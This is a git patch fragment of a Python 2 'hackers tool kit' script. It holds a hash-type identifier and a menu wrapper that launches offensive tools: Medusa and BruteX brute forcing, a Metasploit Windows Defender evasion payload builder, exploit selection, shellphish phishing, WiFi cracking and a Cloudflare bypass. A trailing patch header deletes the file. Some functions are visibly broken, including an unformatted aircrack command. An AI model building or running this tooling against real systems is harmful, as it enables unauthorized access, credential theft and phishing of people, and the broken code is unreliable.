hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + +#ABOUT ME / THE CREATOR START# +#----------------------------# +def about(): + print "\033[92m------------------------------------------------------------" + print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" + print "------------------------------------------------------------" + print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" + print "------------------------------------------------------------" + print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" + print "------------------------------------------------------------" + print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" + print "------------------------------------------------------------\033[0m" +#--------------------------# +#ABOUT ME / THE CREATOR END# + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#CLEAR ALL START# +#---------------# +def clearall(): + os.system("clear") +#-------------# +#CLEAR ALL END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "about": + about() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + found = True +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From ef4231f89a174ed7236474baec8b003c263e54c5 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sat, 11 May 2019 03:39:17 +0100 Subject: [PATCH 109/214] Delete htk.py --- htk.py | 2660 -------------------------------------------------------- 1 file changed, 2660 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index fcc4af9..0000000 --- a/htk.py +++ /dev/null @@ -1,2660 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @unkn0wn_bali -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ 